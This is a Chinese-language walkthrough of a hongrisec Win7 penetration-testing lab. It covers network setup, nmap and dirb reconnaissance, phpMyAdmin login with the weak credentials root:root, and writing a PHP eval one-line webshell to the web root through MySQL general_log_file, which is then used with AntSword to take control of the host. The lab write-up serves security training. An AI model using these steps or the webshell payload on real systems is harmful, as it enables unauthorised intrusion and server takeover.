拓扑图：

前置环境配置：

Win 7

默认密码：hongrisec@201

内网ip:192.168.52.143

打开虚拟网络编辑器

添加网络->VMent1->仅主机模式->子网ip:192.168.145.0

添加网卡：

虚拟机->设置-> 添加->网络适配器

保存，打开win 7并重启：

查看ip地址：

外网ip: Ip:192.168.145.129

内网ip: Ip:192.168.52.143

进入C:\phpstudy,启动

渗透测试：

方法一：phpadmin

打开kali,ip:192.168.145.128

存活主机探测

命令：nmap -sn  192.168.145.0/24

全端口扫描

命令：nmap -A -p 1-65535 192.168.145.129

80端口->  开放  http服务

3306端口->开放 mysql服务

目录扫描

命令：dirb http://192.168.145.129

http://192.168.145.129/phpmyadmin/ 

登录验证：

192.168.145.129:80

泄露：

路径：C:/phpStudy/WWW

使用弱口令进行数据库连接：

root：root

http://192.168.145.129/phpmyadmin/ 

登录->sql。

第一步 查询日志 命令： show variables like '%general%';

发现日志写入系统关闭，需要打开。

命令: set global general_log='on';     

开启成功。

在C:/phpStudy/WWW/2.php路径下写入一句话木马：

set global general_log_file = 'C:/phpStudy/WWW/2.php'

select '<?php @eval($_POST["cmd"]);?>'     

验证：http://192.168.145.129/2.php

使用中国蚁剑连接成功。

拿到服务器主机权限。